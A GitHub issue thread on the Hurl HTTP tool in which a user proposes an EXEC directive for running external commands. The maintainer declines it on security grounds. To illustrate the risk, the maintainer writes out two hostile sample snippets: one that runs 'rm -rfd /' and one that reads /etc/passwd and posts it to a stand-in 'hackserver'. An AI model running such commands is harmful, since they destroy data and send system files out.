### ISSUE TITLE
Interacting with external commands.

### ISSUE THREAD

**Issue by pismute** [Orange-OpenSource/hurl#3312]
### Problem to solve

I would like to write tests for OAuth, authoriation code flow and device code flow.
It requires hurl to behave like a browser.

I would like to write my program with chrome driver for the missing part. but it seems that I can't not inject the program into my hurl scripts.

### Proposal

hurl may have new method for external commands:

```
EXEC mylogin --opt1={{opt1}} --opt2={{opt2}}
EXIT 0
[Capture]
.....
```

hurl may be able to capture data from stdout.

How do you think?

**Comment by jcamiel** [comment]
Hi @pismute, the syntax is clever but we don't want to support running arbitrary command from Hurl file.

For instance, what if your Hurl file is:

```hurl
EXEC rm -rfd /
```

Or this one?

```hurl
EXEC cat /etc/passwd
EXIT 0
[Captures]
passwords: ?

POST https://hackserver
{
  "passwords": {{passwords}}
}
HTTP 200
```

There are too many security pitfall.

**Comment by pismute** [comment]
Thank you!
